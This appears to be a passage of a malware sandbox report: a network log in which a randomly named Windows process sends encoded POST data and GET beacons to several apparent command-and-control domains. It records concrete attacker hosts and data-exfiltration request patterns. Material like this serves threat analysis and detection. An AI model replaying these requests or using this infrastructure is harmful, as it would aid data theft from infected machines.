                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.huwin.club
                                                                                                                                                                                                                                              Origin: http://www.huwin.club
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.huwin.club/cvus/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=G4Xojkfbm0cgEtyWGJhD+C49btoIBoSX4A1lkb+8+10JN3kB8asf6ICdrl5c3jWjem246/GsfHbAmbmotU+rKxbTbv6A8j/Z1ksqROr1lB1Rfrn7T0WCKA8MSyQxDRft6uMorxPUE8j9MWaV0q3ugwByWkJwZqBWDU54fXoV9gU3ZoNeE1dt2K87zmKelhqIzJs/zqXABnFdRgxcTLX9DhbQ3ZD4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.5 | 50025 | 3.33.130.190 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:20:22.168350935 CEST | 1771 | OUT | POST /cvus/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.huwin.club
                                                                                                                                                                                                                                              Origin: http://www.huwin.club
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.huwin.club/cvus/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 50026 | 3.33.130.190 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:20:24.710629940 CEST | 480 | OUT | GET /cvus/?7Bohe=L6/IgR7jnWgHAqCUWtdTnyQ3KOMoF6iy/gVxl52J0nU+SVs5srMG6NDyylAnxUOxWBqWqLnFW3nZioCT6UqXKC7zbsKc4BTPzCMAY+nXmzAcPovgamuSI2ghdEMnHjenpA==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.huwin.club
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Oct 24, 2024 15:20:25.337759972 CEST | 403 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:20:25 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 263
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7Bohe=L6/IgR7jnWgHAqCUWtdTnyQ3KOMoF6iy/gVxl52J0nU+SVs5srMG6NDyylAnxUOxWBqWqLnFW3nZioCT6UqXKC7zbsKc4BTPzCMAY+nXmzAcPovgamuSI2ghdEMnHjenpA==&vD=h0e85v"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.5 | 50027 | 129.226.176.90 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:20:30.652751923 CEST | 734 | OUT | POST /vhqd/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.xueerr.xyz
                                                                                                                                                                                                                                              Origin: http://www.xueerr.xyz
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.xueerr.xyz/vhqd/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=bqxhL3cdr0GY0MgOb33JsfYhs1xvMMfspQXw6+xYvuh1G3DMAtPn7PkvJ0PM6GgmqM01eAea844QehlSmW4wvaDswObv7SICLZQIA8hQLFNb9s0P1f6Ey8Uoo/4x0Vce6CksHTK0/TFojgZ5003rXs+sj0zPLxektgMiFkD0ta6heLZUjUuenD3x19JxDDjH/g3R1uA=
Oct 24, 2024 15:20:31.602010965 CEST | 295 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:20:31 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 150
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.5 | 50028 | 129.226.176.90 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:20:33.201466084 CEST | 754 | OUT | POST /vhqd/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.xueerr.xyz
                                                                                                                                                                                                                                              Origin: http://www.xueerr.xyz
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.xueerr.xyz/vhqd/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=bqxhL3cdr0GY1sQOZUfJ9vYiyFxvFsfopXfw66pIvcF1DlbMBsPn4PkvBUPF+GgpqMwXeCaa87EQejtSmlQzpKDulebh/SICLZQIA4ANLFVb8ckP1+6Dx8U3r/4xwVca6Cl5HSmK/RNojhp50l30ds+Qn0zYbxjUiGM2CCb89LeEb90+52m20jbJluBGSzCulDnhr5XV9BwAHi35ir3aW02ciEzg
Oct 24, 2024 15:20:34.162050962 CEST | 295 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:20:34 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 150
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.5 | 50029 | 129.226.176.90 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:20:35.748178959 CEST | 1771 | OUT | POST /vhqd/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.xueerr.xyz
                                                                                                                                                                                                                                              Origin: http://www.xueerr.xyz
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.xueerr.xyz/vhqd/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Data Ascii: 7Bohe= [TRUNCATED]
Oct 24, 2024 15:20:36.713831902 CEST | 295 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:20:36 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 150
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.5 | 50030 | 129.226.176.90 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:20:38.291840076 CEST | 480 | OUT | GET /vhqd/?7Bohe=WoZBIA9oyl+J2b4VfTP9l9A782ZII/35uSr01551g8NzakXtA+Pa5+JAPkHp6kowgs8acnK71ZwIZDZByVYOuYH08N3N2lAmC4I9AOVCDFEu0aUC6s+F7cMMpoEI61JPvA==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.xueerr.xyz
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Oct 24, 2024 15:20:39.252938032 CEST | 295 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:20:39 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 150
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.5 | 50031 | 213.249.67.10 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:20:44.486295938 CEST | 761 | OUT | POST /z0t0/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.onlineblikje.online
                                                                                                                                                                                                                                              Origin: http://www.onlineblikje.online
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.onlineblikje.online/z0t0/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=wDXRNe2cIr+krahCBpiheDjS00svrevNhWgkiDbAzaRsryJbtqrWbnzygqtRw0SYz9W8qo60wINP3TikKLtJ8x4FxFhk3puUIRZOcIJiPbCQgfC0Uw+YxvYauOGOg3A1qOspcIerxIC7xWvjl3bXepuwssNT3QW9zXWAYTc5P474UTQanvtblY8SYToDV7PfiarVOlc=
Oct 24, 2024 15:20:45.318584919 CEST | 206 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:20:45 GMT
                                                                                                                                                                                                                                              Server: Apache/2.4.56 (Debian)
                                                                                                                                                                                                                                              Location: https://onlineblikjes.nl/
                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.5 | 50032 | 213.249.67.10 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:20:47.026241064 CEST | 781 | OUT | POST /z0t0/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.onlineblikje.online
                                                                                                                                                                                                                                              Origin: http://www.onlineblikje.online
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.onlineblikje.online/z0t0/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=wDXRNe2cIr+kr/pCDIihfjigoksvi+vJhWskiCfQzolsqS5bsrrWcnzyrKtN00Sfz9K0qoG0wIZP3R6kK85KuR4D3Fhm9JuUIRZOcMhcPaqQguy0STmb3fYdtOGOk3ByqOtZcJDMxL67xXfjlj3YRpuqjMMUxBX08Ua2aRlTXqDKYF9w9Nlz24QqIAg0ELu2457lQyJYnJxgEduWP9an9xwLBf4Z
Oct 24, 2024 15:20:47.869518995 CEST | 206 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:20:47 GMT
                                                                                                                                                                                                                                              Server: Apache/2.4.56 (Debian)
                                                                                                                                                                                                                                              Location: https://onlineblikjes.nl/
                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.5 | 50033 | 213.249.67.10 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:20:49.572637081 CEST | 1798 | OUT | POST /z0t0/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.onlineblikje.online
                                                                                                                                                                                                                                              Origin: http://www.onlineblikje.online
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.onlineblikje.online/z0t0/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=wDXRNe2cIr+kr/pCDIihfjigoksvi+vJhWskiCfQzodsqhxbtIzWdnzyoKtO00TDz9COqoKkwKhP3yykIIVK3h4D6lhl3puBIRJKcIFcPaqQgt60VA+b1fYauOHBg3BWqPEhcI32y6a7w3PjmWbYcpu03sM2xEP38UGAaVs8XpTKaQUY6+dbr4cwJi4Jbbmm26DCUVpojdp5DNHVK+jQjksvHoJM51VQfBap9MYrkfie8HXySxoyNIT3nkczAH34OKGnbd+yNxyv+GpWNVPgizIw9j+kKYjgoW7dPfY7Pu7+8wrvb64hsIF75T+sR3HACJfVU/uYWjOzrucjf7pZbn1hZrlJQ6Am0cr6TXGpxfxoXrOhbgMmBubV9GylBwtbqQ3NW3PGERJh4Ogu+AecAOkGqh9eFEtBiCSDWmPgEQqa7Sn2EmjyixJviBS9+KMe07LVSLn1JJo9HlfiNpvbK+ayIErFN8RZhd9O5FT1hoVTSgmUc12eZmRMhq8SJ0rG4HcDt5DgzMUIZLfxOFrXbfYEiA0TZXr7t4N54o7uR/vT6fdWet+qPlrdb5mlCobt/czR1zKZI8BEcYyHG4eKfVXMrdE9Rq7RFsuXDwbbZzAPTIoLuDUx8yZGlrD6gEh4obF3KmNwW4vg2YAnPfp65VKEEBXU6DraaZLNm3OcU1gQ/adXDql8IL3rR7+b6p1da28yT+vZJYhjAX/OpbfFpSYZJZnKCXVkTo32Y+02YFR7jXHCSUhbpaOWU1eYcjhnhcwHBcOWMR+/cSeb4HLMwCEgKWhFvGpDO6A/z+SpN3yCuv/Q2YoQ4xeFSOnTZWlaLykdxRfXDSXyhnQSnsh7yqY/19adedonot3GEMNfnFm+zKR8ZRcSEoNdW08xhpfj3LstDawx/Fmb0poJryyIaBBLNb38Tc2grHU51KwrW3/jqGDVU5hNte+NpQ4x3j11PtL1lpYTQY7G1loJaBuzYt/Bxoj+Erx45XUzZ5GuzVMoGi [TRUNCATED]
Oct 24, 2024 15:20:50.406546116 CEST | 206 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:20:50 GMT
                                                                                                                                                                                                                                              Server: Apache/2.4.56 (Debian)
                                                                                                                                                                                                                                              Location: https://onlineblikjes.nl/
                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.5 | 50034 | 213.249.67.10 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:20:52.119189024 CEST | 489 | OUT | GET /z0t0/?7Bohe=9B/xOqaHJLGzhK9+asydflyTnlILmfDyrXYYsxrw44oQhSljsJ3AUyXQia4yxUul1qSv48mAxItuxzOnZ7dQ4iYj8ngc1biNZhlnUORZPI7XnMKBVwak16kasN63mT84/Q==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.onlineblikje.online
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Oct 24, 2024 15:20:52.976507902 CEST | 355 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:20:52 GMT
                                                                                                                                                                                                                                              Server: Apache/2.4.56 (Debian)
                                                                                                                                                                                                                                              Location: https://onlineblikjes.nl/?7Bohe=9B/xOqaHJLGzhK9+asydflyTnlILmfDyrXYYsxrw44oQhSljsJ3AUyXQia4yxUul1qSv48mAxItuxzOnZ7dQ4iYj8ngc1biNZhlnUORZPI7XnMKBVwak16kasN63mT84/Q==&vD=h0e85v
                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.5 | 50035 | 67.223.117.169 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 15:20:58.155334949 CEST | 752 | OUT | POST /3x2e/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.rtpsilva4d.click
                                                                                                                                                                                                                                              Origin: http://www.rtpsilva4d.click
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.rtpsilva4d.click/3x2e/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=Gzpy5mUD0NM+3QXCBBQh09s/AlX2lsCvlaC73o83csoSHDE0GU1UTONAQJify9Jkuf4DTiJLWsrzz79CpYUzAIjgRRpe45lix/brLyUoXK63gm+jbZLRSTkglOz09UmR9I1DWBOXRYvnY6WVAl7chpUaYcR/gebtQme1v2MRpxooDygB3eoQDcrYdsgjjvQzpR/diig=
Oct 24, 2024 15:20:58.821808100 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:20:58 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Content-Length: 315
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                              54 | 192.168.2.5 | 50036 | 67.223.117.169 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:00.708987951 CEST | 772 | OUT | POST /3x2e/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.rtpsilva4d.click
                                                                                                                                                                                                                                              Origin: http://www.rtpsilva4d.click
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.rtpsilva4d.click/3x2e/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=Gzpy5mUD0NM+lAnCSWshlds4PFX2vMCjlb+73p5ofecSHi00UmdUSONAI5ietNJzuf10Tj1LWs/zz7tCpoowCYj+IBpcmJlix/brLxoSXKC3gWuja9/OMjkjiOz05UmV9I11WB/CRbXnY7mVDxvfopUcGsQ7geqecHOfvwdTpCoWCENrt8g4Q8HgN/oUyfxazyvt813OZQ19F5qpBordi4Pvogbu
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:01.359957933 CEST479INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:21:01 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              Content-Length: 315
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                              55 | 192.168.2.5 | 50037 | 67.223.117.169 | 80 | 2296 | C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:03.269017935 CEST | 1789 | OUT | POST /3x2e/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.rtpsilva4d.click
                                                                                                                                                                                                                                              Origin: http://www.rtpsilva4d.click
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.rtpsilva4d.click/3x2e/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Oct 24, 2024 15:21:04.309240103 CEST479INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:21:04 GMT
                                                                                                                                                                                                                                              Server: Apache
